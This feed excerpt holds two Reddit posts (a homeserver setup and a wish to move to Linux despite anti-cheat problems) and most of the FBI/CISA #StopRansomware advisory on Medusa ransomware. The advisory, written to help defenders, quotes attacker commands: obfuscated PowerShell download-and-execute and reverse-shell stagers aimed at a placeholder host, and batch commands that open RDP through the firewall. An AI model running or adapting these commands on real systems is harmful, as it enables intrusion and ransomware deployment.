<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I have recently moved some of my cloud-service on a small mini-pc and have documented most of my steps through this blog post.</p> <p>Basically, I am using a mini-pc with a nvme as server, connect it to the internet over a protonVPN privacy-VPN, use tailscale as an overlay network, use docker-compose for containers and libvirt/cockpit for VMs. I detail my nginx reverse proxy configuration (so that everything runs over HTTPS) and give example configuration (nginx/docker-compose) for audiobookshelf, gitea, tt-rss. Will add more services over time (jellyfin, rclone for proton drive backup, etc.).</p> <p>hope that helps others. Getting the nginx reverse-proxy right was tedious sometimes, also it standard docker-compose files often expose too much (I try to make everything only available over the nginx proxy).</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/andreashappe"> /u/andreashappe </a> <br> <span><a href="https://snikt.net/blog/2025/04/09/homeserver-services-pt.-1/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1jwlpb2/using_a_minipc_as_small_homeserver_using/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[I would LOVE to completely transition to Linux, but ....]]></title>
<description><![CDATA[I simply love Linux... My main PC is currently on Win10, which is nearing its end. I can't say that I've enjoyed my time on Windows, quite the contrary, if I had to modify anything in the OS, it was actually a huge pain in the ass. The UI is crap, with no flow to it, with some menus straight out ...]]></description>
<link>https://tsecurity.de/de/2684556/linux-tipps/i-would-love-to-completely-transition-to-linux-but/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2684556/linux-tipps/i-would-love-to-completely-transition-to-linux-but/</guid>
<pubDate>Tue, 25 Mar 2025 00:20:04 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><h1>I simply love Linux...</h1> <p><strong>My main PC is currently on Win10, which is nearing its end.</strong> I can't say that I've enjoyed my time on Windows, quite the contrary, if I had to modify anything in the OS, it was actually a huge pain in the ass. The UI is crap, with no flow to it, with some menus straight out of the 2000s, ported from Win XP and the others just loosely slapped on. The only redeeming quality is, in my opinion, its compatibility with large corps and their programs, as Windows is, simply said, almost a monopoly.</p> <p><strong>I've looked at Linux for quite some time now...</strong> especially at Ubuntu and its flavor Zorin OS. So much so, that I've already completely replaced Windows with it on my university-laptop for over a year, which I mainly use to take notes, write on it in convertable mode and code small programs.</p> <p><strong>And for all of this Zorin just... works!</strong> It is fluid, 10x more responsive and cleaner than windows. A clean install doesn't come with any bloatware or unnecessary features pre-installed (Yes, I'm looking at you, Edge and CoPilot) and I can install any app I want, most often than not even FOSS, to fit my exact needs. I can make it look however I want, and whatever I choose, be it Mac-like, Windows(10/11)-like, gnome-like or anything inbetween, it's just clean, modern and gorgeous to look at.</p> <p><strong>Xournal++, Obsidian and rclone to seemlessly sync my device with the cloud...</strong> you name it, it's all there and it just functions as you expect it to. It's all highly customizable so it precisely fits my needs and as a dev myself I also don't shy away from tinkering via the terminal from time to time, to get the exact result I want.</p> <p><strong>Setting up a cronjob to periodically bisync your vault you created with Obsidian with your google drive? Sure!</strong> Writing small scripts to automate some behaviour on startup? Easy! <em>You wanna delete the entire OS recursively? Of course, it's your PC, go the fuck ahead!</em> /s Jokes aside, I've never felt this freedom at ANY point I was on Windows.</p> <p>Linux just does what you tell it to do, as you expect by being the literal <strong>Admin of you PC</strong>. Windows on the contrary stands in the corner, with crossed arms and pouting, like a little toddler, while you try to get it to execute even the simplest tasks.</p> <h1>... so why can't I switch to it?</h1> <p>Now. Why haven't I converted my main PC to Linux yet too? - Simple. Because I also stream in my freetime and most of the games I stream I play together with my community. That means: Blockbusters. AAA-Games. All that stuff, that I also really enjoy playing, for their visuals and spectacle especially.</p> <p>And yes. I realize that Steam especially have put a ton of work into Proton and making 85% of all games on Steam compatible with Linux. And most of the time this also works fine, as long as you stick with Steam. Hell, during my last semester I played the living shit out of Brotato, on my university-laptop. <strong>But. not. With. AAA. Games. From. Other. Companies.</strong></p> <p><strong>It is so frustrating</strong> to regulary read something along the lines of:</p> <blockquote> <p>"Rockstar Games implements kernel-level anticheat, breaks Linux support completely."</p> <p>"EA implements their own Anticheat into all recent titles, makes it blocked by Wine and Proton."</p> </blockquote> <p>... and many other news like that.</p> <p>In short: <strong>The games I want to play, HAVE to play to some degree, don't work.</strong> All major Battlefield titles, including the coming one, besides 4. THE FINALS crashes every 3rd round and there is no fix for it. HELLDIVERS 2 is stable, but I cannot get &gt;40 fps. I could go on. It's all working <em>somewhat</em>, but not as a whole. And this just pisses me off. Because otherwise NOTHING would hold me back of switching entirely. It's just those few titles. I even already re-setup my OBS (which ofc also runs smoother than it ever did on windows).</p> <p>And <strong>as I get less and less freetime</strong> and a bigger and bigger portion of said shrinking freetime is consumed by streaming, there is even less incentive to dual-booting, as I'm doing currently. Because IF I turn my main PC on, I'm streaming. If I'm streaming, I'm playing the aforementioned games. No bueno.</p> <p>The rare times I'm not streaming I usually watch YouTube or work on small pet-projects, which I could (and would love to) do from Zorin.</p> <p><strong>But is it really worth switching your OS for that..?</strong></p> <p>Any opinions? Did you face a similar problem? What would you do in my situation, bite the bullet and switch (unwillingly) to Win11, because of security, or is there an idea that I missed? Is there any potential for the compability of mentioned games to increase in the near future?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/MountainAssignment36"> /u/MountainAssignment36 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1jj537h/i_would_love_to_completely_transition_to_linux_but/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1jj537h/i_would_love_to_completely_transition_to_linux_but/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[#StopRansomware: Medusa Ransomware]]></title>
<description><![CDATA[Summary
Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniq...]]></description>
<link>https://tsecurity.de/de/2663121/sicherheitsluecken/stopransomware-medusa-ransomware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2663121/sicherheitsluecken/stopransomware-medusa-ransomware/</guid>
<pubDate>Wed, 12 Mar 2025 18:06:59 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2><strong>Summary</strong></h2>
<p><strong>Note:</strong> This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit <a href="https://www.cisa.gov/stopransomware" title="Stopransomware.gov">stopransomware.gov</a> to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.</p>
<p>The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Medusa ransomware TTPs and IOCs, identified through FBI investigations as recently as February 2025. </p>
<p>Medusa is a ransomware-as-a-service (RaaS) variant first identified in June 2021. As of February 2025, Medusa developers and affiliates have impacted over 300 victims from a variety of critical infrastructure sectors with affected industries including medical, education, legal, insurance, technology, and manufacturing. The Medusa ransomware variant is unrelated to the <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-181a" title="#StopRansomware: MedusaLocker">MedusaLocker</a> variant and the Medusa mobile malware variant per the FBI’s investigation.</p>
<p>FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the <strong>Mitigations</strong> section of this advisory to reduce the likelihood and impact of Medusa ransomware incidents.</p>
<p>Download the PDF version of this report:</p>
<p>For a downloadable list of IOCs, see:</p>





<div class="c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2025-03/AA25-071A.stix_.xml" class="c-file__link" target="_blank">AA25-071A STIX XML</a>
    <span class="c-file__size">(XML,       34.30 KB
  )</span>
  </div>
</div>





<div class="c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2025-03/AA25-071A-StopRansomware-Medusa-Ransomware.stix_.json" class="c-file__link" target="_blank">AA25-071A STIX JSON</a>
    <span class="c-file__size">(JSON,       42.28 KB
  )</span>
  </div>
</div>
<h3><strong>Technical Details</strong></h3>
<p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v16/matrices/enterprise/" title="Enterprise Matrix">MITRE ATT&amp;CK<sup>®</sup> Matrix for Enterprise</a> framework, version 16. See the <strong>MITRE ATT&amp;CK Tactics and Techniques</strong> section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&amp;CK tactics and techniques.</p>
<h3>Background</h3>
<p>The RaaS Medusa variant has been used to conduct ransomware attacks from 2021 to present. Medusa originally operated as a closed ransomware variant, meaning all development and associated operations were controlled by the same group of cyber threat actors. While Medusa has since progressed to using an affiliate model, important operations such as ransom negotiation are still centrally controlled by the developers. Both Medusa developers and affiliates—referred to as “Medusa actors” in this advisory—employ a double extortion model, where they encrypt victim data and threaten to publicly release exfiltrated data if a ransom is not paid.</p>
<h3>Initial Access</h3>
<p>Medusa developers typically recruit initial access brokers (IABs) in cybercriminal forums and marketplaces to obtain initial access [<a href="https://attack.mitre.org/versions/v16/tactics/TA0001/" title="Initial Access">TA0001</a>] to potential victims. Potential payments between $100 USD and $1 million USD are offered to these affiliates with the opportunity to work exclusively for Medusa. Medusa IABs (affiliates) are known to make use of common techniques, such as:</p>
<ul>
<li><strong>Phishing campaigns</strong> as a primary method for stealing victim credentials [<a href="https://attack.mitre.org/versions/v16/techniques/T1566/" title="Phishing">T1566</a>].</li>
<li><strong>Exploitation of unpatched software vulnerabilities [</strong><a href="https://attack.mitre.org/versions/v16/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a><strong>]</strong> through Common Vulnerabilities and Exposures (CVEs) such as the ScreenConnect vulnerability <a href="https://www.cve.org/CVERecord?id=CVE-2024-1709" title="Authentication bypass using an alternate path or channel">CVE-2024-1709</a> [<a href="https://cwe.mitre.org/data/definitions/288.html" title="Authentication Bypass Using an Alternate Path or Channel">CWE-288: Authentication Bypass Using an Alternate Path or Channel</a>] and Fortinet EMS SQL injection vulnerability [<a href="https://www.cve.org/CVERecord?id=CVE-2023-48788" title="CVE-2023-48788">CVE-2023-48788</a> [<a href="https://cwe.mitre.org/data/definitions/89.html" title="Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')">CWE 89: SQL Injection</a>].</li>
</ul>
<h3>Discovery</h3>
<p>Medusa actors use <a href="https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques" title="Identifying and Mitigating Living Off the Land Techniques">living off the land (LOTL)</a> and legitimate tools Advanced IP Scanner and SoftPerfect Network Scanner for initial user, system, and network enumeration. Once a foothold in a victim network is established, commonly scanned ports include:</p>
<ul>
<li><code>21</code> (FTP)</li>
<li><code>22</code> (SSH)</li>
<li><code>23</code> (Telnet)</li>
<li><code>80</code> (HTTP)</li>
<li><code>115</code> (SFTP)</li>
<li><code>443</code> (HTTPS)</li>
<li><code>1433</code> (SQL database)</li>
<li><code>3050</code> (Firebird database)</li>
<li><code>3128</code> (HTTP web proxy)</li>
<li><code>3306</code> (MySQL database)</li>
<li><code>3389</code> (RDP)</li>
</ul>
<p>Medusa actors primarily use PowerShell [<a href="https://attack.mitre.org/versions/v16/techniques/T1059/001/" title="Command and Scripting Interpreter: PowerShell">T1059.001</a>] and the Windows Command Prompt (cmd.exe) [<a href="https://attack.mitre.org/versions/v16/techniques/T1059/003/" title="Command and Scripting Interpreter: Windows Command Shell">T1059.003</a>] for network [<a href="https://attack.mitre.org/versions/v16/techniques/T1046/" title="Network Service Discovery">T1046</a>] and filesystem enumeration [<a href="https://attack.mitre.org/versions/v16/techniques/T1083/" title="File and Directory Discovery">T1083</a>] and to utilize Ingress Tool Transfer capabilities [<a href="https://attack.mitre.org/versions/v16/techniques/T1105/" title="Ingress Tool Transfer">T1105</a>]. Medusa actors use Windows Management Instrumentation (WMI) [<a href="https://attack.mitre.org/versions/v16/techniques/T1047/" title="Windows Management Instrumentation">T1047</a>] for querying system information.</p>
<h3>Defense Evasion</h3>
<p>Medusa actors use LOTL to avoid detection [<a href="https://attack.mitre.org/versions/v16/tactics/TA0005/" title="Defense Evasion">TA0005</a>]. (See <strong>Appendix A</strong> for associated shell commands observed during FBI investigations of Medusa victims.) Certutil (<code>certutil.exe</code>) is used to avoid detection when performing file ingress.</p>
<p>Actors have been observed using several different PowerShell detection evasion techniques with increasing complexity, which are provided below. Additionally, Medusa actors attempt to cover their tracks by deleting the PowerShell command line history [<a href="https://attack.mitre.org/versions/v16/techniques/T1070/003/" title="Indicator Removal: Clear Command History">T1070.003</a>].</p>
<p>In this example, Medusa actors use a well-known evasion technique that executes a base64 encrypted command [<a href="https://attack.mitre.org/versions/v16/techniques/T1027/013/" title="Obfuscated Files or Information: Encrypted/Encoded File">T1027.013</a>] using specific execution settings.</p>
<ul>
<li><code>powershell -exec bypass -enc &lt;base64 encrypted command string&gt;</code></li>
</ul>
<p>In another example, the DownloadFile string is obfuscated by slicing it into pieces and referencing it via a variable [<a href="https://attack.mitre.org/versions/v16/techniques/T1027/" title="Obfuscated Files or Information">T1027</a>].</p>
<ul>
<li><code>powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http://&lt;ip&gt;/&lt;RAS tool&gt;.msi)</code></li>
</ul>
<p>In the final example, the payload is an obfuscated base64 string read into memory, decompressed from <code>gzip</code>, and used to create a <code>scriptblock</code>. The base64 payload is split using empty strings and concatenation, and uses a format operator (<code>-f</code>) followed by three arguments to specify character replacements in the base64 payload.</p>
<ul>
<li><code>powershell -nop -w hidden -noni -ep bypass &amp;([scriptblock]::create((</code></li>
<li><code>New-Object System.IO.StreamReader(</code></li>
<li><code>New-Object System.IO.Compression.GzipStream((</code></li>
<li><code>New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(</code></li>
<li><code>(('&lt;base64 payload string&gt;')-f'&lt;character replacement 0&gt;','&lt;character replacement 1&gt;', '&lt;character replacement 2&gt;')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))</code></li>
</ul>
<p>The obfuscated base64 PowerShell payload is identical to <code>powerfun.ps1</code>, a publicly available stager script that can create either a reverse or bind shell over TLS to load additional modules. In the bind shell, the script awaits a connection on local port <code>443</code> [<a href="https://attack.mitre.org/versions/v16/techniques/T1071/001/" title="Application Layer Protocol: Web Protocols">T1071.001</a>], and initiates a connection to a remote port <code>443</code> in the reverse shell.</p>
<p>In some instances, Medusa actors attempted to use vulnerable or signed drivers to kill or delete endpoint detection and response (EDR) tools [<a href="https://attack.mitre.org/versions/v16/techniques/T1562/001/" title="Impair Defenses: Disable or Modify Tools">T1562.001</a>].</p>
<p>FBI has observed Medusa actors using the following tools to support command and control (C2) and evade detection:</p>
<ul>
<li>Ligolo.
<ul>
<li>A reverse tunneling tool often used to create secure connections between a compromised host and threat actor’s machine.</li>
</ul>
</li>
<li>Cloudflared.
<ul>
<li>Formerly known as ArgoTunnel.</li>
<li>Used to securely expose applications, services, or servers to the internet via Cloudflare Tunnel without exposing them directly.</li>
</ul>
</li>
</ul>
<h3>Lateral Movement and Execution</h3>
<p>Medusa actors use a variety of legitimate remote access software [<a href="https://attack.mitre.org/versions/v16/techniques/T1219/" title="Remote Access Software">T1219</a>]; they may tailor their choice based on any remote access tools already present in the victim environment as a means of evading detection. Investigations identified Medusa actors using remote access software AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop. Medusa uses these tools—in combination with Remote Desktop Protocol (RDP) [<a href="https://attack.mitre.org/versions/v16/techniques/T1021/001/" title="Remote Services: Remote Desktop Protocol">T1021.001</a>] and PsExec [<a href="https://attack.mitre.org/versions/v16/techniques/T1569/002/" title="System Services: Service Execution">T1569.002</a>]—to move laterally [<a href="https://attack.mitre.org/versions/v16/tactics/TA0008/" title="Lateral Movement">TA0008</a>] through the network and identify files for exfiltration [<a href="https://attack.mitre.org/versions/v16/tactics/TA0010/" title="Exfiltration">TA0010</a>] and encryption [<a href="https://attack.mitre.org/versions/v16/techniques/T1486/" title="Data Encrypted for Impact">T1486</a>]. When provided with valid username and password credentials, Medusa actors use PsExec to:</p>
<ul>
<li>Copy (<code>-c</code>) one script from various batch scripts on the current machine to the remote machine and execute it with <code>SYSTEM</code> level privileges (<code>-s</code>).</li>
<li>Execute an already existing local file on a remote machine with <code>SYSTEM</code> level privileges.</li>
<li>Execute remote shell commands using <code>cmd /c</code>.</li>
</ul>
<p>One of the batch scripts executed by PsExec is <code>openrdp.bat</code>, which first creates a new firewall rule to allow inbound TCP traffic on port <code>3389</code>:</p>
<ul>
<li><code>netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow</code></li>
</ul>
<p>Then, a rule to allow remote WMI connections is created:</p>
<ul>
<li><code>netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes</code></li>
</ul>
<p>Finally, the registry is modified to allow Remote Desktop connections:</p>
<ul>
<li><code>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f</code></li>
</ul>
<p><a href="https://attack.mitre.org/versions/v16/software/S0002/" title="Mimikatz">Mimikatz</a> has also been observed in use for Local Security Authority Subsystem Service (LSASS) dumping [<a href="https://attack.mitre.org/versions/v16/techniques/T1003/001/" title="OS Credential Dumping: LSASS Memory">T1003.001</a>] to harvest credentials [<a href="https://attack.mitre.org/tactics/TA0006/" title="Credential Access">TA0006</a>] and aid lateral movement.</p>
<h3>Exfiltration and Encryption</h3>
<p>Medusa actors install and use <a href="https://attack.mitre.org/versions/v16/software/S1040/" title="Rclone">Rclone</a> to facilitate exfiltration of data to the Medusa C2 servers [<a href="https://attack.mitre.org/versions/v16/techniques/T1567/002/" title="Exfiltration Over Web Service: Exfiltration to Cloud Storage">T1567.002</a>] used by actors and affiliates. The actors use Sysinternals PsExec, PDQ Deploy, or BigFix [<a href="https://attack.mitre.org/versions/v16/techniques/T1072/" title="Software Deployment Tools">T1072</a>] to deploy the encryptor, <code>gaze.exe</code>, on files across the network—with the actors disabling Windows Defender and other antivirus services on specific targets. Encrypted files have a <code>.medusa</code> file extension. The process <code>gaze.exe</code> terminates all services [<a href="https://attack.mitre.org/versions/v16/techniques/T1489/" title="Service Stop">T1489</a>] related to backups, security, databases, communication, file sharing and websites, then deletes shadow copies [<a href="https://attack.mitre.org/versions/v16/techniques/T1490/" title="Inhibit System Recovery">T1490</a>] and encrypts files with AES-256 before dropping the ransom note. The actors then manually turn off [<a href="https://attack.mitre.org/versions/v16/techniques/T1529/" title="System Shutdown/Reboot">T1529</a>] and encrypt virtual machines and delete their previously installed tools [<a href="https://attack.mitre.org/versions/v16/techniques/T1070/" title="Indicator Removal">T1070</a>].</p>
<h3>Extortion</h3>
<p>Medusa RaaS employs a double extortion model, where victims must pay [<a href="https://attack.mitre.org/versions/v16/techniques/T1657/" title="Financial Theft">T1657</a>] to decrypt files and prevent further release. The ransom note demands victims make contact within 48 hours via either a Tor browser based live chat, or via Tox, an end-to-end encrypted instant-messaging platform. If the victim does not respond to the ransom note, Medusa actors will reach out to them directly by phone or email. Medusa operates a <code>.onion</code> data leak site, divulging victims alongside countdowns to the release of information. Ransom demands are posted on the site, with direct hyperlinks to Medusa affiliated cryptocurrency wallets. At this stage, Medusa concurrently advertises sale of the data to interested parties before the countdown timer ends. Victims can additionally pay $10,000 USD in cryptocurrency to add a day to the countdown timer.</p>
<p>FBI investigations identified that after paying the ransom, one victim was contacted by a separate Medusa actor who claimed the negotiator had stolen the ransom amount already paid and requested half of the payment be made again to provide the “true decryptor”— potentially indicating a triple extortion scheme.</p>
<h2><strong>Indicators of Compromise</strong></h2>
<p><strong>Table 1</strong> lists the hashes of malicious files obtained during investigations.</p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 1: Malicious Files</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Files</th>
<th role="columnheader">Hash (MD5)</th>
<th role="columnheader">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>!!!READ_ME_MEDUSA!!!.txt</td>
<td>Redacted</td>
<td>Ransom note file</td>
</tr>
<tr>
<td>openrdp.bat</td>
<td>44370f5c977e415981febf7dbb87a85c</td>
<td>Allows incoming RDP and remote WMI connections</td>
</tr>
<tr>
<td>pu.exe</td>
<td>80d852cd199ac923205b61658a9ec5bc</td>
<td>Reverse shell</td>
</tr>
</tbody>
</table>
<p><strong>Table 2</strong> includes email addresses used by Medusa actors to extort victims; they are exclusively used for ransom negotiation and contacting victims following compromise. These email addresses are not associated with phishing activity conducted by Medusa actors.</p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 2: Medusa Email Addresses</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Email Addresses</th>
<th role="columnheader">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>key.medusa.serviceteam@protonmail.com</td>
<td>Used for ransom negotiation</td>
</tr>
<tr>
<td>medusa.support@onionmail.org</td>
<td>Used for ransom negotiation</td>
</tr>
<tr>
<td>mds.svt.breach@protonmail.com</td>
<td>Used for ransom negotiation</td>
</tr>
<tr>
<td>mds.svt.mir2@protonmail.com</td>
<td>Used for ransom negotiation</td>
</tr>
<tr>
<td>MedusaSupport@cock.li</td>
<td>Used for ransom negotiation</td>
</tr>
</tbody>
</table>
<h2><strong>MITRE ATT&amp;CK Tactics and Techniques</strong></h2>
<p>See <strong>Table 3</strong> – <strong>Table 11</strong> for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&amp;CK® Mapping">Best Practices for MITRE ATT&amp;CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="Decider Tool">Decider Tool</a>.</p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 3: Initial Access</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Exploit Public-Facing Application</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a></td>
<td>Medusa actors exploited unpatched software or n-day vulnerabilities through common vulnerabilities and exposures.</td>
</tr>
<tr>
<td>Initial Access</td>
<td><a href="https://attack.mitre.org/versions/v16/tactics/TA0001/" title="Initial Access">TA0001</a></td>
<td>Medusa actors recruited initial access brokers (IABS) in cybercriminal forums and marketplaces to obtain initial access.</td>
</tr>
<tr>
<td>Phishing</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1566/" title="Phishing">T1566</a></td>
<td>Medusa IABS used phishing campaigns as a primary method for delivering ransomware to victims.</td>
</tr>
</tbody>
</table>
</div>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 4: Defense Evasion</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Indicator Removal: Clear Command History</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1070/003/" title="Indicator Removal: Clear Command History">T1070.003</a></td>
<td>Medusa actors attempt to cover their tracks by deleting the PowerShell command line history.</td>
</tr>
<tr>
<td>Obfuscated Files or Information: Encrypted/Encoded File</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1027/013/" title="Obfuscated Files or Information: Encrypted/Encoded File ">T1027.013</a></td>
<td>Medusa actors use a well-known evasion technique that executes a base64 encrypted command.</td>
</tr>
<tr>
<td>Obfuscated Files or Information</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1027/" title="Obfuscated Files or Information">T1027</a></td>
<td>Medusa actors obfuscated a string by slicing it into pieces and referencing it via a variable.</td>
</tr>
<tr>
<td>Indicator Removal</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1070/" title="Indicator Removal">T1070</a></td>
<td>Medusa actors deleted their previous work and tools installed. </td>
</tr>
<tr>
<td>Impair Defenses: Disable or Modify Tools</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1562/001/" title="Impair Defenses: Disable or Modify Tools ">T1562.001</a></td>
<td>Medusa actors killed or deleted endpoint detection and response tools.</td>
</tr>
</tbody>
</table>
</div>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 5: Discovery</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Network Service Discovery</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1046/" title="Network Service Discovery">T1046</a></td>
<td>Medusa actors utilized living of the land techniques to perform network enumeration.</td>
</tr>
<tr>
<td>File and Directory Discovery</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1083/" title="File and Directory Discovery">T1083</a></td>
<td>Medusa actors utilized Windows Command Prompt for filesystem enumeration.</td>
</tr>
<tr>
<td>Network Share Discovery</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1135/" title="Network Share Discovery">T1135</a></td>
<td>Medusa actors queried shared drives on the local system to gather sources of information.</td>
</tr>
<tr>
<td>System Network Configuration Discovery</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1016/" title="System Network Configuration Discovery">T1016</a></td>
<td>Medusa actors used operating system administrative utilities to gather network information.</td>
</tr>
<tr>
<td>System Information Discovery</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1082/" title="System Information Discovery">T1082</a></td>
<td>Medusa actors used the command <code>systeminfo</code> to gather detailed system information.</td>
</tr>
<tr>
<td>Permission Groups Discovery: Domain Groups</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1069/002/" title="Permission Groups Discovery: Domain Groups">T1069.002</a></td>
<td>Medusa actors attempt to find domain-level group and permission settings.</td>
</tr>
</tbody>
</table>
</div>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 6: Credential Access</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Credential Access</td>
<td><a href="https://attack.mitre.org/tactics/TA0006/" title="Credential Access">TA0006</a></td>
<td>Medusa actors harvest credentials with tools like Mimikatz to gain access to systems.</td>
</tr>
<tr>
<td>OS Credential Dumping: LSASS Memory</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1003/001/" title="OS Credential Dumping: LSASS Memory">T1003.001</a></td>
<td>Medusa actors were observed accessing credential material stored in process memory or Local Security Authority Subsystem Service (LSASS) using Mimkatz.</td>
</tr>
</tbody>
</table>
</div>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 7: Lateral Movement and Execution</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Lateral Movement</td>
<td><a href="https://attack.mitre.org/versions/v16/tactics/TA0008/" title="Lateral Movement">TA0008</a></td>
<td>Medusa actors performed techniques to move laterally without detection once they gained initial access.</td>
</tr>
<tr>
<td>Command and Scripting Interpreter: PowerShell</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1059/001/" title="Command and Scripting Interpreter: PowerShell">T1059.001</a></td>
<td>Medusa actors used PowerShell, a powerful interactive command-line interface and scripting environment for ingress, network, and filesystem enumeration.</td>
</tr>
<tr>
<td>Command and Scripting Interpreter: Windows Command Shell</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1059/003/" title="Command and Scripting Interpreter: Windows Command Shell ">T1059.003</a></td>
<td>Medusa actors used Windows Command Prompt—which can be used to control almost any aspect of a system—for ingress, network, and filesystem enumeration. </td>
</tr>
<tr>
<td>Software Deployment Tools</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1072/" title="Software Deployment Tools">T1072</a></td>
<td>Medusa Actors used PDQ Deploy and BigFix to deploy the encryptor on files across the network.</td>
</tr>
<tr>
<td>Remote Services: Remote Desktop Protocol</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1021/001/" title="Remote Services: Remote Desktop Protocol ">T1021.001</a></td>
<td>Medusa actors used Remote Desktop Protocol (RDP), a common feature in operating systems, to log into an interactive session with a system and move laterally.</td>
</tr>
<tr>
<td>System Services</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1569/002/" title="System Services ">T1569.002</a></td>
<td>Medusa actors used Sysinternals PsExec to deploy the encryptor on files across the network.</td>
</tr>
<tr>
<td>Windows Management Instrumentation</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1047/" title="Windows Management Instrumentation">T1047</a></td>
<td>Medusa actors abused Windows Management Instrumentation to query system information.</td>
</tr>
</tbody>
</table>
</div>
